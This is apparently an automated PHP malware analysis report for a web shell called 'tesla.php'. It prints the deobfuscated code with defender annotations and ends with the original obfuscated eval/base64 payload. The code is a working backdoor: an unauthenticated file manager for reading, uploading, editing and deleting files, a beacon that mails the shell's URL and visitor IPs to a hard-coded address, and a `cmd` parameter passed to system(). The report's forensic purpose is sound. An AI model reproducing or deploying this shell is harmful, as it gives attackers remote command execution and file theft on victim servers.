PHP Malware Analysis


Filename: tesla.php

Tags

URLs
Emails
  • fatonahnasiah@gmail.com
Execution
  • system
Input
  • _GET
  • _POST
  • _FILES
Environment
  • set_time_limit
  • error_reporting
  • php_uname
  • getcwd
Files
  • file_get_contents
  • copy

Deobfuscated code

 <?php 
eval /* PHPDeobfuscator eval output */ {
    // Turns off PHP error reporting for the rest of the request.
    error_reporting(0);
    // A session is opened, but no $_SESSION value is read anywhere in the deobfuscated
    // code shown on this page: nothing below is gated behind a password or login check.
    session_start();
    // Legacy shim: when magic quotes are enabled, strip the added backslashes from every
    // POST value so submitted paths and file contents are used exactly as sent.
    // NOTE(analysis): get_magic_quotes_gpc() was removed in PHP 8.0, so on 8.0+ this call
    // raises an undefined-function Error and this stage likely aborts here. Worth checking
    // the host's PHP version when judging whether the file manager was ever usable.
    if (get_magic_quotes_gpc()) {
        foreach ($_POST as $key => $value) {
            $_POST[$key] = stripslashes($value);
        }
    }
    echo "<!DOCTYPE HTML>\r\n<link href=\"https://fonts.googleapis.com/css?family=Kelly+Slab\" rel=\"stylesheet\" type=\"text/css\">\r\n<link href=\"https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css\" rel=\"stylesheet\" type=\"text/css\"/>\r\n<center>\r\n<style type=\"text/css\">\r\nbody {\r\n\tfont-family: Kelly Slab;\r\n\tbackground-color: black;\r\n\tcolor: lime;\r\n\t}\r\n#content tr:hover{\r\n\tbackground-color: grey;\r\n\ttext-shadow:0px 0px 10px #000000;\r\n\t}\r\n#content .first{\r\n\tcolor: #000000;\r\n\tbackground-image:url(#);\r\n\t}\r\n#content .first:hover{\r\n\tbackground-color: grey;\r\n\ttext-shadow:0px 0px 1px #339900;\r\n\t}\r\ntable, th, td {\r\n\t\tborder-collapse:collapse;\r\n\t\tpadding: 5px;\r\n\t\tcolor: lime;\r\n\t\t}\r\n.table_home, .th_home, .td_home { \r\n\t\tcolor: lime;\r\n\t\tborder: 2px solid grey;\r\n\t\tpadding: 7px;\r\n\t\t}\r\na{\r\n\tfont-size: 19px;\r\n\tcolor: #00ff00;\r\n\ttext-decoration: none;\r\n\t}\r\na:hover{\r\n\tcolor: white;\r\n\ttext-shadow:0px 0px 10px #339900;\r\n\t}\r\ninput,select,textarea{\r\n\tborder: 1px #ffffff solid;\r\n\t-moz-border-radius: 5px;\r\n\t-webkit-border-radius:5px;\r\n\tborder-radius:5px;\r\n\t}\r\n.close {\r\n\toverflow: auto;\r\n\tborder: 1px solid lime;\r\n\tbackground: lime;\r\n\tcolor: white;\r\n\t}\r\n.r {\r\n\tfloat: right;\r\n\ttext-align: right;\r\n\t}\r\n</style>\r\n<a href=\"?\"><h1 style=\"font-family: Kelly Slab; font-size: 35px; color: white;\">\r\nIm Sanz Shell Bypass </h1></a>\r\n<BODY>\r\n\r\n<table width=\"95%\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" align=\"left\">\r\n<tr><td>";
    // Host-fingerprint banner: prints the requester's address (REMOTE_ADDR), the address
    // that the request's Host header resolves to (gethostbyname on HTTP_HOST), SERVER_NAME
    // and the full php_uname() string (OS, hostname, kernel/build).
    // All values are concatenated into the HTML without escaping.
    echo "<tr><td><font color='white'>\r\n<i class='fa fa-user'></i> <td>: <font color='lime'>" . $_SERVER['REMOTE_ADDR'] . "<tr><td><font color='white'>\r\n<i class='fa fa-desktop'></i> <td>: <font color='lime'>" . gethostbyname($_SERVER['HTTP_HOST']) . " / " . $_SERVER['SERVER_NAME'] . "<tr><td><font color='white'>\r\n<i class='fa fa-hdd-o'></i> <td>: <font color='lime'>" . php_uname() . "</font></tr></td></table>";
    // Opens the table that holds the breadcrumb, upload form and file listing.
    echo "<table width=\"95%\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" align=\"center\">\r\n<tr align=\"center\"><td align=\"center\"><br>";
    // Working directory of the file manager: taken verbatim from the `path` query
    // parameter when present, otherwise the script's own directory. No validation or
    // confinement to the web root is visible, so any directory the PHP process can read
    // is browsable. In access logs, requests to this file carrying `path=` mark browsing.
    if (isset($_GET['path'])) {
        $path = $_GET['path'];
    } else {
        $path = getcwd();
    }
    // Normalise Windows-style separators so the same code handles both platforms.
    $path = str_replace('\\', '/', $path);
    $paths = explode('/', $path);
    // Breadcrumb: one link per path component, each pointing back at this script with the
    // cumulative path up to that component.
    foreach ($paths as $id => $pat) {
        // A leading empty component means the path is absolute: emit the root link.
        if ($pat == '' && $id == 0) {
            // $a is assigned here but never read in the deobfuscated code.
            $a = true;
            echo "<i class=\"fa fa-folder-o\"></i> : <a href=\"?path=/\">/</a>";
            continue;
        }
        // Skip empty components produced by doubled or trailing slashes.
        if ($pat == '') {
            continue;
        }
        echo "<a href=\"?path=";
        // Rebuild the prefix paths[0..id]; components are echoed without HTML escaping.
        for ($i = 0; $i <= $id; $i++) {
            echo "{$paths[$i]}";
            if ($i != $id) {
                echo "/";
            }
        }
        echo '">' . $pat . '</a>/';
    }
    echo "<br><br><br><font color=\"lime\"><form enctype=\"multipart/form-data\" method=\"POST\">\r\nUpload File: <input type=\"file\" name=\"file\" style=\"color:lime;border:2px solid lime;\" required/></font>\r\n<input type=\"submit\" value=\"UPLOAD\" style=\"margin-top:4px;width:100px;height:27px;font-family:Kelly Slab;font-size:15;background:black;color: lime;border:2px solid lime;border-radius:5px\"/>";
    // Upload handler: copies the uploaded temp file into the request-controlled $path
    // under the client-supplied original filename. No check on extension, content type,
    // size or destination is visible, and copy() is used rather than move_uploaded_file().
    // Incident scoping: treat files that appeared in directories writable by the PHP
    // process after this shell was planted as suspect until verified.
    if (isset($_FILES['file'])) {
        if (copy($_FILES['file']['tmp_name'], $path . '/' . $_FILES['file']['name'])) {
            echo "<br><br><font color=\"lime\">UPLOAD SUCCES !!!!</font><br/>";
        } else {
            // Indonesian: "file failed to upload".
            echo "<script>alert(\"File Gagal Diupload !!\")</script>";
        }
    }
    echo "</form></td></tr>";
    if (isset($_GET['filesrc'])) {
        // File viewer: the `filesrc` query parameter is echoed back unescaped as a label,
        // then the file it names is read and shown in a read-only textarea (contents are
        // HTML-escaped). The path is used as given, so any file readable by the PHP
        // process can be disclosed. Configuration files and stored credentials reachable
        // by that account should be considered exposed and rotated.
        echo "<tr><td>files >> ";
        echo $_GET['filesrc'];
        echo "</tr></td></table><br />";
        echo ' <textarea  style="font-size: 8px; border: 1px solid white; background-color: black; color: white; width: 100%;height: 1200px;" readonly> ' . htmlspecialchars(file_get_contents($_GET['filesrc'])) . '</textarea>';
    } elseif (isset($_GET['option']) && $_POST['opt'] != 'delete') {
        echo '</table><br /><center>' . $_POST['path'] . '<br /><br />';
        // Per-entry operations, selected by the `opt` field. Each one acts on the
        // request-supplied `path`; no allow-list or base-directory confinement is visible.
        //
        // chmod: change the permission bits of the target, then re-render the form
        // pre-filled with the target's current mode (last four octal digits of fileperms()).
        if ($_POST['opt'] == 'chmod') {
            if (isset($_POST['perm'])) {
                // The submitted `perm` value is handed to chmod() as received.
                if (chmod($_POST['path'], $_POST['perm'])) {
                    echo "<br><br><font color=\"lime\">CHANGE PERMISSION SUCCESS !!</font><br/>";
                } else {
                    echo "<script>alert(\"Change Permission Gagal !!\")</script>";
                }
            }
            echo '<form method="POST">
Permission : <input name="perm" type="text" size="4" value="' . substr(sprintf('%o', fileperms($_POST['path'])), -4) . '" style="width:80px; height: 30px;"/>
<input type="hidden" name="path" value="' . $_POST['path'] . '">
<input type="hidden" name="opt" value="chmod">
<input type="submit" value="Lanjut" style="width:60px; height: 30px;"/>
</form>';
        // 'btw': unlike its siblings this branch reads `opt` from the query string. It only
        // renders a "New Name" form that posts opt=delete with type=buat in the URL.
        // NOTE(analysis): no handler for type=buat is visible in the deobfuscated code, so
        // this looks like unfinished functionality. Confirm against the packed original.
        } elseif ($_GET['opt'] == 'btw') {
            $cwd = getcwd();
            echo '<form action="?option&path=' . $cwd . '&opt=delete&type=buat" method="POST">
New Name : <input name="name" type="text" size="25" value="Folder" style="width:300px; height: 30px;"/>
<input type="hidden" name="path" value="' . $cwd . '">
<input type="hidden" name="opt" value="delete">
<input type="submit" value="Go" style="width:100px; height: 30px;"/>
</form>';
        // rename: move the target to <current $path>/<newname>.
        } elseif ($_POST['opt'] == 'rename') {
            if (isset($_POST['newname'])) {
                if (rename($_POST['path'], $path . '/' . $_POST['newname'])) {
                    echo "<br><br><font color=\"lime\">CHANGE NAME SUCCESS !!</font><br/>";
                } else {
                    echo "<script>alert(\"Change Name Gagal !!\")</script>";
                }
                // Keep the form below showing the new name.
                $_POST['name'] = $_POST['newname'];
            }
            echo '<form method="POST">
New Name : <input name="newname" type="text" size="5" style="width:20%; height:30px;" value="' . $_POST['name'] . '" />
<input type="hidden" name="path" value="' . $_POST['path'] . '">
<input type="hidden" name="opt" value="rename">
<input type="submit" value="Lanjut" style="height:30px;" />
</form>';
        // edit: overwrite the target file with the submitted `src` text, then show the
        // file's current contents in an editable textarea.
        // Clean-up note: any file writable by the PHP process, application source included,
        // may have been altered through this branch. Verify against a known-good copy.
        } elseif ($_POST['opt'] == 'edit') {
            if (isset($_POST['src'])) {
                // Mode 'w' truncates the file first; the fopen() result is not checked.
                $fp = fopen($_POST['path'], 'w');
                if (fwrite($fp, $_POST['src'])) {
                    echo "<br><br><font color=\"lime\">EDIT FILE SUCCESS !!</font><br/>";
                } else {
                    echo "<script>alert(\"Edit File Gagal !!\")</script>";
                }
                fclose($fp);
            }
            echo '<form method="POST">
<textarea cols=80 rows=20 name="src" style="font-size: 8px; border: 1px solid white; background-color: black; color: white; width: 100%;height: 1000px;">' . htmlspecialchars(file_get_contents($_POST['path'])) . '</textarea><br />
<input type="hidden" name="path" value="' . $_POST['path'] . '">
<input type="hidden" name="opt" value="edit">
<input type="submit" value="Lanjut" style="height:30px; width:70px;"/>
</form>';
        }
        echo "</center>";
    } else {
        echo "</table><br /><center>";
        // Delete handler: runs when the URL carries `option` and the POSTed `opt` is
        // 'delete'. The POSTed `type` selects rmdir() (directory) or unlink() (file) on the
        // request-supplied `path`, with no confirmation or path restriction visible.
        // Forensics: files or logs may have been removed through this branch, so an absent
        // artefact on disk is not evidence that it never existed.
        if (isset($_GET['option']) && $_POST['opt'] == 'delete') {
            if ($_POST['type'] == 'dir') {
                if (rmdir($_POST['path'])) {
                    echo "<br><br><font color=\"lime\">DELETE DIR SUCCESS !!</font><br/>";
                } else {
                    // The doubled '>' after </script> is in the sample itself.
                    echo "<script>alert(\"Delete Dir Gagal !!\")</script>>";
                }
            } elseif ($_POST['type'] == 'file') {
                if (unlink($_POST['path'])) {
                    echo "<br><br><font color=\"lime\">DELETE FILE SUCCESS !!</font><br/>";
                } else {
                    echo "<script>alert(\"Delete File Gagal !!\")</script>";
                }
            }
        }
        echo "</center>";
        $scandir = scandir($path);
        $pa = getcwd();
        echo "<div id=\"content\"><table width=\"95%\" class=\"table_home\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\">\r\n<tr class=\"first\">\r\n<th><center>Name</center></th>\r\n<th><center>Size</center></th>\r\n<th><center>Perm</center></th>\r\n<th><center>Options</center></th>\r\n</tr>\r\n<tr>";
        foreach ($scandir as $dir) {
            if (!is_dir("{$path}/{$dir}") || $dir == '.' || $dir == '..') {
                continue;
            }
            echo "<tr>\r\n<td class=td_home><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='><a href=\"?path={$path}/{$dir}\"> {$dir}</a></td>\r\n<td class=td_home><center>DIR</center></td>\r\n<td class=td_home><center>";
            if (is_writable("{$path}/{$dir}")) {
                echo "<font color=\"#57FF00\">";
            } elseif (!is_readable("{$path}/{$dir}")) {
                echo "<font color=\"#FF0004\">";
            }
            echo perms("{$path}/{$dir}");
            if (is_writable("{$path}/{$dir}") || !is_readable("{$path}/{$dir}")) {
                echo "</font>";
            }
            echo "</center></td>\r\n<td class=td_home><center><form method=\"POST\" action=\"?option&path={$path}\">\r\n<select name=\"opt\" style=\"margin-top:6px;width:100px;font-family:Kelly Slab;font-size:15;background:black;color:lime;border:2px solid lime;border-radius:5px\">\r\n<option value=\"Action\">Action</option>\r\n<option value=\"delete\">Delete</option>\r\n<option value=\"chmod\">Chmod</option>\r\n<option value=\"rename\">Rename</option>\r\n</select>\r\n<input type=\"hidden\" name=\"type\" value=\"dir\">\r\n<input type=\"hidden\" name=\"name\" value=\"{$dir}\">\r\n<input type=\"hidden\" name=\"path\" value=\"{$path}/{$dir}\">\r\n<input type=\"submit\" value=\">\" style=\"margin-top:6px;width:27;font-family:Kelly Slab;font-size:15;background:black;color:lime;border:2px solid lime;border-radius:5px\"/>\r\n</form></center></td>\r\n</tr>";
        }
        echo "<tr class=\"first\"><td></td><td></td><td></td><td></td></tr>";
        foreach ($scandir as $file) {
            if (!is_file("{$path}/{$file}")) {
                continue;
            }
            $size = filesize("{$path}/{$file}") / 1024;
            $size = round($size, 3);
            if ($size >= 1024) {
                $size = round($size / 1024, 2) . ' MB';
            } else {
                $size .= ' KB';
            }
            echo "<tr>\r\n<td class=td_home><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href=\"?filesrc={$path}/{$file}&path={$path}\"> {$file}</a></td>\r\n<td class=td_home><center>" . $size . "</center></td>\r\n<td class=td_home><center>";
            if (is_writable("{$path}/{$file}")) {
                echo "<font color=\"#57FF00\">";
            } elseif (!is_readable("{$path}/{$file}")) {
                echo "<font color=\"#FF0004\">";
            }
            echo perms("{$path}/{$file}");
            if (is_writable("{$path}/{$file}") || !is_readable("{$path}/{$file}")) {
                echo "</font>";
            }
            echo "</center></td>\r\n<td class=td_home><center><form method=\"POST\" action=\"?option&path={$path}\">\r\n<select name=\"opt\" style=\"margin-top:6px;width:100px;font-family:Kelly Slab;font-size:15;background:black;color:lime;border:2px solid lime;border-radius:5px\">\r\n<option value=\"Action\">Action</option>\r\n<option value=\"delete\">Delete</option>\r\n<option value=\"edit\">Edit</option>\r\n<option value=\"rename\">Rename</option>\r\n<option value=\"chmod\">Chmod</option>\r\n</select>\r\n<input type=\"hidden\" name=\"type\" value=\"file\">\r\n<input type=\"hidden\" name=\"name\" value=\"{$file}\">\r\n<input type=\"hidden\" name=\"path\" value=\"{$path}/{$file}\">\r\n<input type=\"submit\" value=\">\" style=\"margin-top:6px;width:27;font-family:Kelly Slab;font-size:15;background:black;color:lime;border:2px solid lime;border-radius:5px\"/>\r\n</form></center></td>\r\n</tr>";
        }
        echo "</table>\r\n</div>";
    }
    /**
     * Render a path's mode bits as a 10-character, ls-style string (e.g. "-rw-r--r--").
     *
     * Benign display helper used by the listing code to fill the "Perm" column.
     * The first character encodes the file type; the remaining nine are the
     * owner/group/other read-write-execute triads, with setuid/setgid/sticky folded
     * into the execute positions.
     *
     * @param string $file Path passed straight to fileperms().
     * @return string Type character followed by nine permission characters.
     */
    function perms($file)
    {
        // The fileperms() result is used without checking for a failure return.
        $perms = fileperms($file);
        // File-type character, chosen by testing the type bits from the largest mask down.
        if (($perms & 0xc000) == 0xc000) {
            // Socket
            $info = 's';
        } elseif (($perms & 0xa000) == 0xa000) {
            // Symbolic Link
            $info = 'l';
        } elseif (($perms & 0x8000) == 0x8000) {
            // Regular
            $info = '-';
        } elseif (($perms & 0x6000) == 0x6000) {
            // Block special
            $info = 'b';
        } elseif (($perms & 0x4000) == 0x4000) {
            // Directory
            $info = 'd';
        } elseif (($perms & 0x2000) == 0x2000) {
            // Character special
            $info = 'c';
        } elseif (($perms & 0x1000) == 0x1000) {
            // FIFO pipe
            $info = 'p';
        } else {
            // Unknown
            $info = 'u';
        }
        // Owner triad; 0x800 (setuid) turns the execute slot into 's' (with x) or 'S' (without).
        $info .= $perms & 0x100 ? 'r' : '-';
        $info .= $perms & 0x80 ? 'w' : '-';
        $info .= $perms & 0x40 ? $perms & 0x800 ? 's' : 'x' : ($perms & 0x800 ? 'S' : '-');
        // Group triad; 0x400 (setgid) is shown the same way.
        $info .= $perms & 0x20 ? 'r' : '-';
        $info .= $perms & 0x10 ? 'w' : '-';
        $info .= $perms & 0x8 ? $perms & 0x400 ? 's' : 'x' : ($perms & 0x400 ? 'S' : '-');
        // Other triad; 0x200 (sticky) turns the execute slot into 't' or 'T'.
        $info .= $perms & 0x4 ? 'r' : '-';
        $info .= $perms & 0x2 ? 'w' : '-';
        $info .= $perms & 0x1 ? $perms & 0x200 ? 't' : 'x' : ($perms & 0x200 ? 'T' : '-');
        return $info;
    }
};
eval /* PHPDeobfuscator eval output */ {
    // Stage 2: access beacon. Nothing in this block is conditional, so it runs on every
    // request that reaches the file.
    // Runtime tweaks: output buffering and error display off (warnings suppressed with @),
    // no execution time limit, 64M memory limit.
    @ini_set('output_buffering', 0);
    @ini_set('display_errors', 0);
    set_time_limit(0);
    ini_set('memory_limit', '64M');
    header('Content-Type: text/html; charset=UTF-8');
    // Hard-coded recipient of the beacon (also listed under "Emails" in the report above).
    $tujuanmail = 'fatonahnasiah@gmail.com';
    // Full URL of the current request, i.e. where this shell lives on the victim site.
    $x_path = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
    // Message body: the shell URL plus the address of whoever made the request.
    $pesan_alert = "fix {$x_path} :p *IP Address : [ " . $_SERVER['REMOTE_ADDR'] . " ]";
    // Sends the beacon with subject "LOGGER". The fourth argument of mail() is the
    // additional-headers parameter; here it receives "[ <ip> ]", not a well-formed header.
    // Defender notes: the recipient address and the "LOGGER" subject are indicators to
    // search for in MTA logs and the outbound mail queue, where each hit timestamps an
    // access to the shell. Because the location is mailed out, assume the shell's URL is
    // known to the recipient (presumably the kit author), not only to whoever planted it.
    mail($tujuanmail, "LOGGER", $pesan_alert, "[ " . $_SERVER['REMOTE_ADDR'] . " ]");
};
eval /* PHPDeobfuscator eval output */ {
    // Stage 3: command execution. If the request carries a `cmd` value, it is passed
    // verbatim to system() and the output is returned inside <pre>, after which the
    // script exits. No authentication or filtering precedes the call, so commands run
    // with the privileges of the PHP process.
    // $_REQUEST merges GET and POST data, plus cookies when the server's
    // request_order/variables_order setting includes them.
    // Detection: `cmd=` in the query string of requests for this file shows up in access
    // logs, but values sent in a POST body or cookie normally do not. Process auditing
    // (web server or PHP worker spawning shell children) is the more reliable signal.
    // Hardening: where the application does not need them, list system() and related
    // functions in php.ini's disable_functions.
    if (isset($_REQUEST["cmd"])) {
        echo "<pre>";
        $cmd = $_REQUEST["cmd"];
        system($cmd);
        echo "</pre>";
        die;
    }
};


Original code

 <?php 
eval(str_rot13(gzinflate(str_rot13(base64_decode('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